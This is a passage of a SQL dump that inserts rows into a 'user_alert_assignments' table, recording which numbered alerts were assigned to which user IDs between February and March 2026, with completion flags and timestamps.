(793, 133, 250, '2026-02-08', 0, 0, 0, NULL),
(794, 133, 253, '2026-02-08', 0, 0, 0, NULL),
(795, 133, 709, '2026-02-08', 0, 0, 0, NULL),
(796, 133, 229, '2026-02-08', 0, 0, 0, NULL),
(797, 133, 230, '2026-02-08', 0, 0, 0, NULL),
(798, 133, 956, '2026-02-08', 0, 0, 0, NULL),
(799, 135, 953, '2026-02-08', 0, 0, 0, NULL),
(800, 135, 302, '2026-02-08', 0, 0, 0, NULL),
(801, 135, 238, '2026-02-08', 0, 0, 0, NULL),
(802, 135, 632, '2026-02-08', 0, 0, 0, NULL),
(803, 135, 710, '2026-02-08', 0, 0, 0, NULL),
(804, 135, 624, '2026-02-08', 0, 0, 0, NULL),
(805, 135, 959, '2026-02-08', 0, 0, 0, NULL),
(806, 135, 252, '2026-02-08', 0, 0, 0, NULL),
(807, 135, 234, '2026-02-08', 0, 0, 0, NULL),
(808, 135, 630, '2026-02-08', 0, 0, 0, NULL),
(809, 42, 723, '2026-02-08', 0, 0, 0, NULL),
(810, 42, 684, '2026-02-08', 0, 0, 0, NULL),
(811, 42, 718, '2026-02-08', 0, 0, 0, NULL),
(812, 42, 947, '2026-02-08', 0, 0, 0, NULL),
(813, 42, 751, '2026-02-08', 0, 0, 0, NULL),
(814, 42, 940, '2026-02-08', 0, 0, 0, NULL),
(815, 42, 742, '2026-02-08', 0, 0, 0, NULL),
(816, 42, 935, '2026-02-08', 0, 0, 0, NULL),
(817, 42, 938, '2026-02-08', 0, 0, 0, NULL),
(818, 136, 238, '2026-02-09', 0, 0, 0, NULL),
(819, 136, 760, '2026-02-09', 0, 0, 0, NULL),
(820, 136, 630, '2026-02-09', 0, 0, 0, NULL),
(821, 136, 956, '2026-02-09', 0, 0, 0, NULL),
(822, 136, 710, '2026-02-09', 0, 0, 0, NULL),
(823, 136, 762, '2026-02-09', 0, 0, 0, NULL),
(824, 136, 250, '2026-02-09', 0, 0, 0, NULL),
(825, 136, 216, '2026-02-09', 0, 0, 0, NULL),
(826, 136, 253, '2026-02-09', 0, 0, 0, NULL),
(827, 136, 219, '2026-02-09', 0, 0, 0, NULL),
(828, 137, 762, '2026-02-10', 0, 0, 0, NULL),
(829, 137, 953, '2026-02-10', 0, 0, 0, NULL),
(830, 137, 230, '2026-02-10', 0, 0, 0, NULL),
(831, 137, 238, '2026-02-10', 0, 0, 0, NULL),
(832, 137, 252, '2026-02-10', 0, 0, 0, NULL),
(833, 137, 709, '2026-02-10', 0, 0, 0, NULL),
(834, 137, 687, '2026-02-10', 1, 0, 0, '2026-02-13 03:04:15'),
(835, 137, 632, '2026-02-10', 0, 0, 0, NULL),
(836, 137, 951, '2026-02-10', 0, 0, 0, NULL),
(837, 137, 957, '2026-02-10', 0, 0, 0, NULL),
(838, 34, 753, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(839, 34, 955, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(840, 34, 940, '2026-02-10', 0, 0, 0, NULL),
(841, 34, 945, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(842, 34, 947, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(843, 34, 745, '2026-02-10', 1, 0, 0, '2026-02-11 05:45:24'),
(844, 34, 956, '2026-02-10', 0, 0, 0, NULL),
(845, 34, 840, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(846, 34, 851, '2026-02-10', 0, 0, 0, NULL),
(847, 34, 946, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(848, 133, 762, '2026-02-11', 0, 0, 0, NULL),
(849, 133, 760, '2026-02-11', 0, 0, 0, NULL),
(850, 133, 219, '2026-02-11', 0, 0, 0, NULL),
(851, 133, 229, '2026-02-11', 0, 0, 0, NULL),
(852, 133, 624, '2026-02-11', 0, 0, 0, NULL),
(853, 133, 710, '2026-02-11', 0, 0, 0, NULL),
(854, 133, 252, '2026-02-11', 0, 0, 0, NULL),
(855, 133, 221, '2026-02-11', 0, 0, 0, NULL),
(856, 133, 687, '2026-02-11', 0, 0, 0, NULL),
(857, 133, 238, '2026-02-11', 0, 0, 0, NULL),
(858, 34, 947, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(859, 34, 840, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(860, 34, 945, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(861, 34, 955, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(862, 34, 956, '2026-02-11', 0, 0, 0, NULL),
(863, 34, 762, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(864, 34, 940, '2026-02-11', 0, 0, 0, NULL),
(865, 34, 720, '2026-02-11', 0, 0, 0, NULL),
(866, 34, 609, '2026-02-11', 0, 0, 0, NULL),
(867, 34, 230, '2026-02-11', 0, 0, 0, NULL),
(868, 102, 938, '2026-02-11', 0, 0, 0, NULL),
(869, 102, 933, '2026-02-11', 0, 0, 0, NULL),
(870, 102, 219, '2026-02-11', 0, 0, 0, NULL),
(871, 102, 711, '2026-02-11', 1, 0, 0, '2026-02-16 05:42:03'),
(872, 102, 655, '2026-02-11', 0, 0, 0, NULL),
(873, 102, 750, '2026-02-11', 0, 0, 0, NULL),
(874, 102, 709, '2026-02-11', 0, 0, 0, NULL),
(875, 102, 718, '2026-02-11', 0, 0, 0, NULL),
(876, 102, 947, '2026-02-11', 0, 0, 0, NULL),
(877, 102, 835, '2026-02-11', 0, 0, 0, NULL),
(878, 138, 302, '2026-02-11', 0, 0, 0, NULL),
(879, 138, 221, '2026-02-11', 0, 0, 0, NULL),
(880, 138, 959, '2026-02-11', 0, 0, 0, NULL),
(881, 138, 958, '2026-02-11', 0, 0, 0, NULL),
(882, 138, 709, '2026-02-11', 0, 0, 0, NULL),
(883, 138, 216, '2026-02-11', 0, 0, 0, NULL),
(884, 138, 710, '2026-02-11', 0, 0, 0, NULL),
(885, 138, 687, '2026-02-11', 0, 0, 0, NULL),
(886, 138, 238, '2026-02-11', 0, 0, 0, NULL),
(887, 138, 253, '2026-02-11', 0, 0, 0, NULL),
(888, 140, 687, '2026-02-11', 0, 0, 0, NULL),
(889, 140, 762, '2026-02-11', 0, 0, 0, NULL),
(890, 140, 957, '2026-02-11', 0, 0, 0, NULL),
(891, 140, 234, '2026-02-11', 0, 0, 0, NULL),
(892, 140, 250, '2026-02-11', 0, 0, 0, NULL),
(893, 140, 253, '2026-02-11', 0, 0, 0, NULL),
(894, 140, 216, '2026-02-11', 0, 0, 0, NULL),
(895, 140, 229, '2026-02-11', 0, 0, 0, NULL),
(896, 140, 221, '2026-02-11', 0, 0, 0, NULL),
(897, 140, 624, '2026-02-11', 0, 0, 0, NULL),
(898, 107, 933, '2026-02-12', 0, 0, 0, NULL),
(899, 107, 834, '2026-02-12', 0, 0, 0, NULL),
(900, 107, 653, '2026-02-12', 0, 0, 0, NULL),
(901, 107, 942, '2026-02-12', 0, 0, 0, NULL),
(902, 107, 729, '2026-02-12', 0, 0, 0, NULL),
(903, 107, 302, '2026-02-12', 0, 0, 0, NULL),
(904, 107, 849, '2026-02-12', 0, 0, 0, NULL),
(905, 107, 839, '2026-02-12', 0, 0, 0, NULL),
(906, 107, 658, '2026-02-12', 0, 0, 0, NULL),
(907, 107, 714, '2026-02-12', 0, 0, 0, NULL),
(908, 141, 953, '2026-02-12', 0, 0, 0, NULL),
(909, 141, 238, '2026-02-12', 0, 0, 0, NULL),
(910, 141, 630, '2026-02-12', 0, 0, 0, NULL),
(911, 141, 687, '2026-02-12', 0, 0, 0, NULL),
(912, 141, 959, '2026-02-12', 0, 0, 0, NULL),
(913, 141, 957, '2026-02-12', 1, 0, 0, '2026-02-12 07:25:05'),
(914, 141, 729, '2026-02-12', 1, 0, 0, '2026-02-12 07:13:30'),
(915, 141, 234, '2026-02-12', 0, 0, 0, NULL),
(916, 141, 253, '2026-02-12', 1, 0, 0, '2026-02-12 07:18:58'),
(917, 141, 624, '2026-02-12', 0, 0, 0, NULL),
(918, 137, 239, '2026-02-12', 0, 0, 0, NULL),
(919, 137, 250, '2026-02-12', 0, 0, 0, NULL),
(920, 137, 959, '2026-02-12', 0, 0, 0, NULL),
(921, 137, 229, '2026-02-12', 1, 0, 0, '2026-02-13 16:10:32'),
(922, 137, 958, '2026-02-12', 0, 0, 0, NULL),
(923, 137, 955, '2026-02-12', 0, 0, 0, NULL),
(924, 137, 252, '2026-02-12', 0, 0, 0, NULL),
(925, 137, 234, '2026-02-12', 0, 0, 0, NULL),
(926, 137, 710, '2026-02-12', 0, 0, 0, NULL),
(927, 137, 687, '2026-02-12', 1, 0, 0, '2026-02-13 03:04:15'),
(928, 137, 958, '2026-02-13', 0, 0, 0, NULL),
(929, 137, 710, '2026-02-13', 0, 0, 0, NULL),
(930, 137, 955, '2026-02-13', 0, 0, 0, NULL),
(931, 137, 250, '2026-02-13', 0, 0, 0, NULL),
(932, 137, 762, '2026-02-13', 0, 0, 0, NULL),
(933, 137, 219, '2026-02-13', 0, 0, 0, NULL),
(934, 137, 954, '2026-02-13', 0, 0, 0, NULL),
(935, 137, 229, '2026-02-13', 1, 0, 0, '2026-02-13 16:10:32'),
(936, 137, 230, '2026-02-13', 0, 0, 0, NULL),
(937, 137, 216, '2026-02-13', 0, 0, 0, NULL),
(938, 34, 762, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(939, 34, 955, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(940, 34, 946, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(941, 34, 945, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(942, 34, 753, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(943, 34, 959, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(944, 34, 840, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(945, 34, 675, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(946, 34, 252, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(947, 34, 947, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(948, 78, 612, '2026-02-13', 1, 0, 0, '2026-02-22 07:55:05'),
(949, 78, 698, '2026-02-13', 0, 0, 0, NULL),
(950, 78, 936, '2026-02-13', 1, 0, 0, '2026-03-13 02:56:35'),
(951, 78, 846, '2026-02-13', 0, 0, 0, NULL),
(952, 78, 693, '2026-02-13', 0, 0, 0, NULL),
(953, 78, 939, '2026-02-13', 0, 0, 0, NULL),
(954, 78, 932, '2026-02-13', 1, 0, 0, '2026-02-17 08:59:18'),
(955, 78, 851, '2026-02-13', 0, 0, 0, NULL),
(956, 78, 735, '2026-02-13', 1, 0, 0, '2026-03-15 08:50:53'),
(957, 78, 954, '2026-02-13', 1, 0, 0, '2026-03-11 10:46:30'),
(958, 141, 624, '2026-02-13', 0, 0, 0, NULL),
(959, 141, 219, '2026-02-13', 0, 0, 0, NULL),
(960, 141, 760, '2026-02-13', 0, 0, 0, NULL),
(961, 141, 630, '2026-02-13', 0, 0, 0, NULL),
(962, 141, 955, '2026-02-13', 0, 0, 0, NULL),
(963, 141, 250, '2026-02-13', 0, 0, 0, NULL),
(964, 141, 954, '2026-02-13', 0, 0, 0, NULL),
(965, 141, 762, '2026-02-13', 0, 0, 0, NULL),
(966, 141, 953, '2026-02-13', 0, 0, 0, NULL),
(967, 141, 302, '2026-02-13', 0, 0, 0, NULL),
(968, 126, 632, '2026-02-13', 0, 0, 0, NULL),
(969, 126, 219, '2026-02-13', 0, 0, 0, NULL),
(970, 126, 958, '2026-02-13', 0, 0, 0, NULL),
(971, 126, 250, '2026-02-13', 0, 0, 0, NULL),
(972, 126, 234, '2026-02-13', 0, 0, 0, NULL),
(973, 126, 302, '2026-02-13', 0, 0, 0, NULL),
(974, 126, 760, '2026-02-13', 0, 0, 0, NULL),
(975, 126, 953, '2026-02-13', 0, 0, 0, NULL),
(976, 126, 238, '2026-02-13', 0, 0, 0, NULL),
(977, 126, 624, '2026-02-13', 0, 0, 0, NULL),
(978, 126, 302, '2026-02-14', 0, 0, 0, NULL),
(979, 126, 760, '2026-02-14', 0, 0, 0, NULL),
(980, 126, 630, '2026-02-14', 0, 0, 0, NULL),
(981, 126, 221, '2026-02-14', 0, 0, 0, NULL),
(982, 126, 624, '2026-02-14', 0, 0, 0, NULL),
(983, 126, 250, '2026-02-14', 0, 0, 0, NULL),
(984, 126, 234, '2026-02-14', 0, 0, 0, NULL),
(985, 126, 955, '2026-02-14', 0, 0, 0, NULL),
(986, 126, 959, '2026-02-14', 0, 0, 0, NULL),
(987, 126, 762, '2026-02-14', 0, 0, 0, NULL),
(988, 34, 959, '2026-02-14', 0, 0, 0, NULL),
(989, 34, 840, '2026-02-14', 0, 0, 0, NULL),
(990, 34, 753, '2026-02-14', 0, 0, 0, NULL),
(991, 34, 945, '2026-02-14', 0, 0, 0, NULL),
(992, 34, 947, '2026-02-14', 0, 0, 0, NULL),
(993, 34, 946, '2026-02-14', 0, 0, 0, NULL),
(994, 34, 940, '2026-02-14', 0, 0, 0, NULL),
(995, 34, 733, '2026-02-14', 0, 0, 0, NULL),
(996, 34, 637, '2026-02-14', 0, 0, 0, NULL),
(997, 34, 854, '2026-02-14', 0, 0, 0, NULL),
(998, 142, 219, '2026-02-14', 0, 0, 0, NULL),
(999, 142, 959, '2026-02-14', 0, 0, 0, NULL),
(1000, 142, 953, '2026-02-14', 0, 0, 0, NULL),
(1001, 142, 762, '2026-02-14', 0, 0, 0, NULL),
(1002, 142, 630, '2026-02-14', 0, 0, 0, NULL),
(1003, 142, 955, '2026-02-14', 0, 0, 0, NULL),
(1004, 142, 958, '2026-02-14', 0, 0, 0, NULL),
(1005, 142, 760, '2026-02-14', 0, 0, 0, NULL),
(1006, 142, 252, '2026-02-14', 0, 0, 0, NULL),
(1007, 142, 632, '2026-02-14', 0, 0, 0, NULL),
(1008, 145, 760, '2026-02-14', 0, 0, 0, NULL),
(1009, 145, 762, '2026-02-14', 0, 0, 0, NULL),
(1010, 145, 624, '2026-02-14', 0, 0, 0, NULL),
(1011, 145, 959, '2026-02-14', 0, 0, 0, NULL),
(1012, 145, 953, '2026-02-14', 0, 0, 0, NULL),
(1013, 145, 250, '2026-02-14', 0, 0, 0, NULL),
(1014, 145, 955, '2026-02-14', 0, 0, 0, NULL),
(1015, 145, 302, '2026-02-14', 0, 0, 0, NULL),
(1016, 145, 221, '2026-02-14', 0, 0, 0, NULL),
(1017, 145, 954, '2026-02-14', 0, 0, 0, NULL),
(1018, 95, 252, '2026-02-14', 0, 0, 0, NULL),
(1019, 95, 302, '2026-02-14', 0, 0, 0, NULL),
(1020, 95, 238, '2026-02-14', 0, 0, 0, NULL),
(1021, 95, 234, '2026-02-14', 0, 0, 0, NULL),
(1022, 95, 630, '2026-02-14', 0, 0, 0, NULL),
(1023, 95, 250, '2026-02-14', 0, 0, 0, NULL),
(1024, 95, 953, '2026-02-14', 0, 0, 0, NULL),
(1025, 95, 958, '2026-02-14', 0, 0, 0, NULL),
(1026, 95, 760, '2026-02-14', 0, 0, 0, NULL),
(1027, 95, 709, '2026-02-14', 0, 0, 0, NULL),
(1028, 109, 757, '2026-02-14', 1, 0, 0, '2026-02-22 18:14:26'),
(1029, 109, 732, '2026-02-14', 1, 0, 0, '2026-02-15 11:28:49'),
(1030, 109, 624, '2026-02-14', 1, 0, 0, '2026-02-15 11:28:03'),
(1031, 109, 608, '2026-02-14', 1, 0, 0, '2026-02-22 18:15:18'),
(1032, 109, 843, '2026-02-14', 0, 0, 0, NULL),
(1033, 153, 953, '2026-02-15', 0, 0, 0, NULL),
(1034, 153, 234, '2026-02-15', 0, 0, 0, NULL),
(1035, 153, 762, '2026-02-15', 0, 0, 0, NULL),
(1036, 153, 632, '2026-02-15', 0, 0, 0, NULL),
(1037, 153, 760, '2026-02-15', 0, 0, 0, NULL),
(1038, 99, 851, '2026-02-15', 1, 0, 0, '2026-02-16 19:55:37'),
(1039, 99, 630, '2026-02-15', 1, 0, 0, '2026-02-16 19:56:52'),
(1040, 99, 846, '2026-02-15', 1, 0, 0, '2026-02-18 12:08:22'),
(1041, 99, 843, '2026-02-15', 1, 0, 0, '2026-02-16 19:56:03'),
(1042, 99, 640, '2026-02-15', 1, 0, 0, '2026-02-15 20:18:41'),
(1043, 109, 644, '2026-02-15', 1, 0, 0, '2026-02-18 16:55:11'),
(1044, 109, 840, '2026-02-15', 0, 0, 0, NULL),
(1045, 109, 613, '2026-02-15', 1, 0, 0, '2026-02-18 16:55:35'),
(1046, 109, 838, '2026-02-15', 1, 0, 0, '2026-02-22 18:15:41'),
(1047, 109, 718, '2026-02-15', 0, 0, 0, NULL),
(1048, 95, 632, '2026-02-15', 0, 0, 0, NULL),
(1049, 95, 955, '2026-02-15', 0, 0, 0, NULL),
(1050, 95, 630, '2026-02-15', 0, 0, 0, NULL),
(1051, 95, 953, '2026-02-15', 0, 0, 0, NULL),
(1052, 95, 762, '2026-02-15', 0, 0, 0, NULL),
(1053, 34, 1260, '2026-02-15', 0, 0, 0, NULL),
(1054, 34, 1261, '2026-02-15', 0, 0, 0, NULL),
(1055, 34, 955, '2026-02-15', 0, 0, 0, NULL),
(1056, 34, 1258, '2026-02-15', 0, 0, 0, NULL),
(1057, 34, 945, '2026-02-15', 0, 0, 0, NULL),
(1058, 159, 219, '2026-02-15', 0, 0, 0, NULL),
(1059, 159, 221, '2026-02-15', 0, 0, 0, NULL),
(1060, 159, 953, '2026-02-15', 1, 0, 0, '2026-02-16 02:30:24'),
(1061, 159, 1250, '2026-02-15', 0, 0, 0, NULL),
(1062, 159, 234, '2026-02-15', 0, 0, 0, NULL),
(1063, 34, 1254, '2026-02-16', 0, 0, 0, NULL),
(1064, 34, 947, '2026-02-16', 0, 0, 0, NULL),
(1065, 34, 1258, '2026-02-16', 0, 0, 0, NULL),
(1066, 34, 743, '2026-02-16', 0, 0, 0, NULL),
(1067, 34, 940, '2026-02-16', 0, 0, 0, NULL),
(1068, 102, 663, '2026-02-16', 0, 0, 0, NULL),
(1069, 102, 614, '2026-02-16', 0, 0, 0, NULL),
(1070, 102, 693, '2026-02-16', 0, 0, 0, NULL),
(1071, 102, 620, '2026-02-16', 0, 0, 0, NULL),
(1072, 102, 851, '2026-02-16', 0, 0, 0, NULL);
INSERT INTO `user_alert_assignments` (`id`, `user_id`, `alert_id`, `assigned_date`, `completed`, `is_replay`, `xp_earned`, `completed_at`) VALUES
(1073, 161, 845, '2026-02-16', 1, 0, 0, '2026-02-16 08:11:24'),
(1074, 161, 658, '2026-02-16', 1, 0, 0, '2026-02-16 08:12:20'),
(1075, 161, 648, '2026-02-16', 0, 0, 0, NULL),
(1076, 161, 757, '2026-02-16', 0, 0, 0, NULL),
(1077, 161, 1261, '2026-02-16', 1, 0, 0, '2026-02-16 08:12:44'),
(1078, 60, 302, '2026-02-16', 0, 0, 0, NULL),
(1079, 60, 219, '2026-02-16', 0, 0, 0, NULL),
(1080, 60, 221, '2026-02-16', 0, 0, 0, NULL),
(1081, 60, 760, '2026-02-16', 0, 0, 0, NULL),
(1082, 60, 762, '2026-02-16', 0, 0, 0, NULL),
(1083, 99, 840, '2026-02-16', 0, 0, 0, NULL),
(1084, 99, 947, '2026-02-16', 1, 0, 0, '2026-02-16 20:10:55'),
(1085, 99, 1250, '2026-02-16', 1, 0, 0, '2026-02-16 20:11:39'),
(1086, 99, 958, '2026-02-16', 1, 0, 0, '2026-02-16 20:17:45'),
(1087, 99, 945, '2026-02-16', 0, 0, 0, NULL),
(1089, 99, 940, '2026-02-16', 1, 0, 0, '2026-02-16 20:12:48'),
(1090, 99, 701, '2026-02-16', 1, 0, 0, '2026-02-18 12:06:56'),
(1091, 165, 221, '2026-02-16', 1, 0, 0, '2026-02-16 20:37:09'),
(1092, 165, 632, '2026-02-16', 1, 0, 0, '2026-02-16 20:31:54'),
(1093, 165, 234, '2026-02-16', 1, 0, 0, '2026-02-16 20:38:48'),
(1094, 165, 762, '2026-02-16', 1, 0, 0, '2026-02-16 20:38:24'),
(1095, 165, 955, '2026-02-16', 1, 0, 0, '2026-02-16 20:37:03'),
(1096, 45, 250, '2026-02-17', 0, 0, 0, NULL),
(1097, 45, 219, '2026-02-17', 0, 0, 0, NULL),
(1098, 45, 760, '2026-02-17', 0, 0, 0, NULL),
(1099, 45, 302, '2026-02-17', 0, 0, 0, NULL),
(1108, 34, 946, '2026-02-17', 0, 0, 0, NULL),
(1109, 34, 1257, '2026-02-17', 0, 0, 0, NULL),
(1110, 34, 945, '2026-02-17', 0, 0, 0, NULL),
(1111, 34, 838, '2026-02-17', 0, 0, 0, NULL),
(1112, 34, 854, '2026-02-17', 0, 0, 0, NULL),
(1113, 165, 946, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:47'),
(1114, 165, 840, '2026-02-17', 1, 0, 0, '2026-02-17 08:28:22'),
(1115, 165, 945, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:38'),
(1116, 165, 619, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:43'),
(1117, 165, 755, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:27'),
(1118, 166, 302, '2026-02-17', 0, 0, 0, NULL),
(1119, 166, 219, '2026-02-17', 0, 0, 0, NULL),
(1120, 166, 760, '2026-02-17', 0, 0, 0, NULL),
(1121, 166, 250, '2026-02-17', 0, 0, 0, NULL),
(1130, 157, 219, '2026-02-17', 1, 0, 0, '2026-02-18 01:33:47'),
(1131, 157, 302, '2026-02-17', 1, 0, 0, '2026-02-18 01:30:25'),
(1132, 157, 250, '2026-02-17', 1, 0, 0, '2026-02-18 01:34:47'),
(1133, 157, 760, '2026-02-17', 1, 0, 0, '2026-02-18 01:35:23'),
(1134, 119, 712, '2026-02-17', 0, 0, 0, NULL),
(1135, 119, 657, '2026-02-17', 0, 0, 0, NULL),
(1136, 119, 697, '2026-02-17', 0, 0, 0, NULL),
(1137, 119, 839, '2026-02-17', 0, 0, 0, NULL),
(1138, 119, 1259, '2026-02-17', 0, 0, 0, NULL),
(1139, 78, 718, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1140, 78, 750, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1141, 78, 1259, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1142, 78, 848, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1143, 78, 934, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1144, 78, 620, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1145, 78, 696, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1146, 78, 854, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1147, 78, 618, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1148, 78, 933, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1149, 126, 713, '2026-02-19', 0, 0, 0, NULL),
(1150, 126, 637, '2026-02-19', 1, 0, 0, '2026-02-19 23:43:17'),
(1151, 126, 847, '2026-02-19', 0, 0, 0, NULL),
(1152, 126, 608, '2026-02-19', 0, 0, 0, NULL),
(1153, 126, 943, '2026-02-19', 0, 0, 0, NULL),
(1154, 177, 712, '2026-02-19', 1, 0, 0, '2026-02-22 17:40:22'),
(1155, 177, 758, '2026-02-19', 1, 0, 0, '2026-02-22 17:50:13'),
(1156, 177, 694, '2026-02-19', 1, 0, 0, '2026-02-22 17:53:39'),
(1157, 177, 692, '2026-02-19', 1, 0, 0, '2026-02-22 17:36:31'),
(1158, 177, 605, '2026-02-19', 1, 0, 0, '2026-02-22 17:52:04'),
(1159, 177, 934, '2026-02-22', 1, 0, 0, '2026-02-22 11:59:19'),
(1160, 177, 717, '2026-02-22', 1, 0, 0, '2026-02-22 13:25:32'),
(1161, 177, 638, '2026-02-22', 1, 0, 0, '2026-02-22 17:43:45'),
(1162, 177, 718, '2026-02-22', 1, 0, 0, '2026-02-22 17:54:09'),
(1163, 177, 605, '2026-02-22', 1, 0, 0, '2026-02-22 17:52:04'),
(1164, 34, 1253, '2026-02-23', 0, 0, 0, NULL),
(1165, 34, 1257, '2026-02-23', 0, 0, 0, NULL),
(1166, 34, 1255, '2026-02-23', 0, 0, 0, NULL),
(1167, 34, 714, '2026-02-23', 0, 0, 0, NULL),
(1168, 34, 854, '2026-02-23', 0, 0, 0, NULL),
(1169, 180, 661, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1170, 180, 855, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1171, 180, 606, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1172, 180, 834, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1173, 180, 702, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1174, 177, 731, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1175, 177, 765, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1176, 177, 737, '2026-02-23', 1, 0, 0, '2026-03-11 10:11:36'),
(1177, 177, 660, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1178, 177, 609, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1179, 78, 1310, '2026-02-24', 0, 0, 0, NULL),
(1180, 78, 1269, '2026-02-24', 0, 0, 0, NULL),
(1181, 78, 1043, '2026-02-24', 0, 0, 0, NULL),
(1182, 78, 714, '2026-02-24', 0, 0, 0, NULL),
(1183, 78, 1268, '2026-02-24', 0, 0, 0, NULL),
(1184, 177, 696, '2026-02-25', 1, 0, 0, '2026-03-11 10:11:36'),
(1185, 177, 705, '2026-02-25', 1, 0, 0, '2026-02-25 15:11:18'),
(1186, 177, 618, '2026-02-25', 1, 0, 0, '2026-02-25 15:11:18'),
(1187, 177, 606, '2026-02-25', 1, 0, 0, '2026-03-03 11:56:55'),
(1188, 177, 698, '2026-02-25', 1, 0, 0, '2026-02-25 15:11:18'),
(1189, 174, 855, '2026-02-26', 0, 0, 0, NULL),
(1190, 174, 842, '2026-02-26', 0, 0, 0, NULL),
(1191, 174, 646, '2026-02-26', 0, 0, 0, NULL),
(1192, 174, 643, '2026-02-26', 0, 0, 0, NULL),
(1193, 174, 943, '2026-02-26', 0, 0, 0, NULL),
(1194, 109, 721, '2026-02-26', 0, 0, 0, NULL),
(1195, 109, 685, '2026-02-26', 0, 0, 0, NULL),
(1196, 109, 1253, '2026-02-26', 0, 0, 0, NULL),
(1197, 109, 938, '2026-02-26', 0, 0, 0, NULL),
(1198, 109, 1305, '2026-02-26', 0, 0, 0, NULL),
(1199, 189, 641, '2026-02-27', 0, 0, 0, NULL),
(1200, 189, 693, '2026-02-27', 0, 0, 0, NULL),
(1201, 189, 733, '2026-02-27', 0, 0, 0, NULL),
(1202, 189, 854, '2026-02-27', 0, 0, 0, NULL),
(1203, 189, 847, '2026-02-27', 0, 0, 0, NULL),
(1204, 196, 652, '2026-02-27', 0, 0, 0, NULL),
(1205, 196, 753, '2026-02-27', 0, 0, 0, NULL),
(1206, 196, 1272, '2026-02-27', 0, 0, 0, NULL),
(1207, 196, 770, '2026-02-27', 0, 0, 0, NULL),
(1208, 196, 839, '2026-02-27', 0, 0, 0, NULL),
(1209, 199, 606, '2026-02-27', 0, 0, 0, NULL),
(1210, 199, 641, '2026-02-27', 0, 0, 0, NULL),
(1211, 199, 943, '2026-02-27', 0, 0, 0, NULL),
(1212, 199, 643, '2026-02-27', 0, 0, 0, NULL),
(1213, 199, 693, '2026-02-27', 0, 0, 0, NULL),
(1214, 74, 1257, '2026-02-27', 0, 0, 0, NULL),
(1215, 74, 1255, '2026-02-27', 0, 0, 0, NULL),
(1216, 74, 1253, '2026-02-27', 0, 0, 0, NULL),
(1217, 74, 1304, '2026-02-27', 0, 0, 0, NULL),
(1218, 74, 666, '2026-02-27', 0, 0, 0, NULL),
(1219, 199, 854, '2026-02-28', 0, 0, 0, NULL),
(1220, 199, 848, '2026-02-28', 0, 0, 0, NULL),
(1221, 199, 646, '2026-02-28', 0, 0, 0, NULL),
(1222, 199, 648, '2026-02-28', 0, 0, 0, NULL),
(1223, 199, 943, '2026-02-28', 0, 0, 0, NULL),
(1224, 199, 836, '2026-03-01', 0, 0, 0, NULL),
(1225, 199, 942, '2026-03-01', 0, 0, 0, NULL),
(1226, 199, 697, '2026-03-01', 0, 0, 0, NULL),
(1227, 199, 656, '2026-03-01', 0, 0, 0, NULL),
(1228, 199, 1267, '2026-03-01', 0, 0, 0, NULL),
(1229, 177, 620, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1230, 177, 1043, '2026-03-01', 1, 0, 0, '2026-03-11 10:11:36'),
(1231, 177, 669, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1232, 177, 1268, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1233, 177, 616, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1234, 34, 1255, '2026-03-01', 0, 0, 0, NULL),
(1235, 34, 1257, '2026-03-01', 0, 0, 0, NULL),
(1236, 34, 1253, '2026-03-01', 0, 0, 0, NULL),
(1237, 34, 770, '2026-03-01', 0, 0, 0, NULL),
(1241, 34, 765, '2026-03-01', 0, 0, 0, NULL),
(1242, 225, 849, '2026-03-02', 1, 0, 0, '2026-03-06 13:15:27'),
(1243, 225, 606, '2026-03-02', 1, 0, 0, '2026-03-05 08:19:14'),
(1244, 225, 643, '2026-03-02', 1, 0, 0, '2026-03-09 05:47:02'),
